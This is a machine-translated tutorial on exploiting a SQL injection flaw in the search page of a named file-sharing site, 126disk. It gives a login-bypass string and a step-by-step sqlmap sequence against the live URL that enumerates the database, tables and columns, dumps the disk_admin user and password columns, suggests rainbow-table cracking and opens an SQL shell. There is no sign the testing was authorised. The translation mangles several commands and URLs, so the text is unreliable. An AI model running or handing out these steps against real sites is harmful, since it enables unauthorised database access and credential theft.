126disk online disk SQL Injection Vulnerability

There are many SQL injection points, including user login injection, such as the universal password admin' or 1 = 1-, and some interactive injection in Web programs, such as queries. For more information about SQL injection, see www.2cto.com/article/201209/153277.html. Because the query keywords entered by the 126disk are not filtered, resulting in SQL Injection Vulnerabilities, you can detect database information, view database data, and even get the entire database locally, that is, drag the database.
 
We enter helloworld in the search box of 126disk online disk, view the result, http://pan.baidu.com/share/link? Consumer id = 63647 & uk = 537055152. An error is reported directly, indicating that the single quotation marks we entered are parsed. An error is returned when the SQL syntax of the web program is queried. We can manually test and use the union command to return the desired data. Here, sqlmap is used for automated testing.
 
1, find the url of the injection point, here the query using the get method, url is http://so.126disk.com/search? Key = helloworld. The default sqlmap path in Backtrack is/pentest/database/sqlmap. You can also download it online for free. Command:
 
./Sqlmap. py-u http://so.126disk.com/search? Key = helloworld-dbs. This command is used to test the database. Tracing network detection results




We can see that the database is mysql, the operating system is windows2003, the server is IIS6, And the php technology is used to detect the database 126disk. The information_schema database is the mysql system library, which contains some users, and tables.
 
2. Test the table name. We have detected the database name, and then test the table name. Command:
 
./Sqlmap. py-u http://so.126disk.com/search? Key = helloworld-D 126 disk-table. The tracing network test result is as follows:


We can see 24 tables in total.
 
3. Test the column name. The database and table names are detected. Next we will test the column names of the tables we are interested in. Let's test the column name in the disk_admin table. Command:
 
./Sqlmap. py-u http://so.126disk.com/search? Key = helloworld-D 126 disk-T disk_admin-columns:


, We can see that the table contains the user and pass columns that we are interested in.
 
4, test data, next we test the database user data, command:./sqlmap. py-u http://so.126disk.com/search? Key = helloworld-D 126 disk-T disk_admin-C user, pass-dump, so that we can detect the user and pass columns in disk_admin. The test results will not be mapped here. Currently, websites generally do not store plaintext passwords. Generally, md5 or sha1 encryption may also have salt values. If you want to read plaintext, go to the next rainbow table to crack it.
 
Sqlmap also has some interesting parameters, such as-current-user. You can view the users currently logged on to the database.-SQL-shell is used to create an SQL shell, with this shell, we can easily run SQL commands. Command:
 
./Sqlmap. py-u http://so.126disk.com/search? Key = helloworld-SQL-shell, for example: